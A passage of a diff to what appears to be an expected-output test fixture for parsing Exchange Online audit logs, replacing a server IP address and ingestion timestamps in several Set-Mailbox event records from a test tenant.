bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", 
@@ -2283,12 +2283,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -2333,7 +2333,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { 
@@ -2345,8 +2345,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177647500Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:44\",\"ExternalAccess\":true,\"Id\":\"e79cb83c-25b7-4777-57f0-08d7ac0f1f74\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/Migration.8f3e7716-2011-43e4-96b1-aba62d229136\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"Management\",\"Value\":\"True\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"DisplayName\",\"Value\":\"Microsoft Exchange Migration\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"9 GB (9,663,676,416 bytes)\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"Migration\",\"Value\":\"True\"},{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/Migration.8f3e7716-2011-43e4-96b1-aba62d229136\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM 
(Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853117200Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:44\",\"ExternalAccess\":true,\"Id\":\"e79cb83c-25b7-4777-57f0-08d7ac0f1f74\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/Migration.8f3e7716-2011-43e4-96b1-aba62d229136\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"Management\",\"Value\":\"True\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"DisplayName\",\"Value\":\"Microsoft Exchange Migration\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"9 GB (9,663,676,416 bytes)\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"Migration\",\"Value\":\"True\"},{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/Migration.8f3e7716-2011-43e4-96b1-aba62d229136\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM 
(Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -2366,12 +2366,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -2414,7 +2414,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { 
@@ -2426,8 +2426,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177650300Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:14\",\"ExternalAccess\":true,\"Id\":\"ee2a5c48-f068-4672-3e34-08d7adfc0bf4\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + 
"ingested": "2021-12-09T13:42:30.853122900Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:14\",\"ExternalAccess\":true,\"Id\":\"ee2a5c48-f068-4672-3e34-08d7adfc0bf4\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", 
@@ -2447,12 +2447,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -2495,7 +2495,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { 
@@ -2507,8 +2507,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177653100Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:14\",\"ExternalAccess\":true,\"Id\":\"d3533d4d-f62f-4731-d0c9-08d7adfc0c7b\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + 
"ingested": "2021-12-09T13:42:30.853127Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:14\",\"ExternalAccess\":true,\"Id\":\"d3533d4d-f62f-4731-d0c9-08d7adfc0c7b\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", 
@@ -2528,12 +2528,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -2576,7 +2576,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { 
@@ -2588,8 +2588,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177656400Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:20\",\"ExternalAccess\":true,\"Id\":\"b9f4dff2-c7f5-41eb-eae8-08d7ac0f3492\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + 
"ingested": "2021-12-09T13:42:30.853130300Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:20\",\"ExternalAccess\":true,\"Id\":\"b9f4dff2-c7f5-41eb-eae8-08d7ac0f3492\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", 
@@ -2609,12 +2609,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -2657,7 +2657,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { 
@@ -2669,8 +2669,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177659300Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:08\",\"ExternalAccess\":true,\"Id\":\"bc03d223-966c-4e33-6cf7-08d7ac0f2d88\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + 
"ingested": "2021-12-09T13:42:30.853135200Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:08\",\"ExternalAccess\":true,\"Id\":\"bc03d223-966c-4e33-6cf7-08d7ac0f2d88\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", 
@@ -2690,12 +2690,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -2738,7 +2738,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { 
@@ -2750,8 +2750,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177662Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:20\",\"ExternalAccess\":true,\"Id\":\"b9f4dff2-c7f5-41eb-eae8-08d7ac0f3492\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 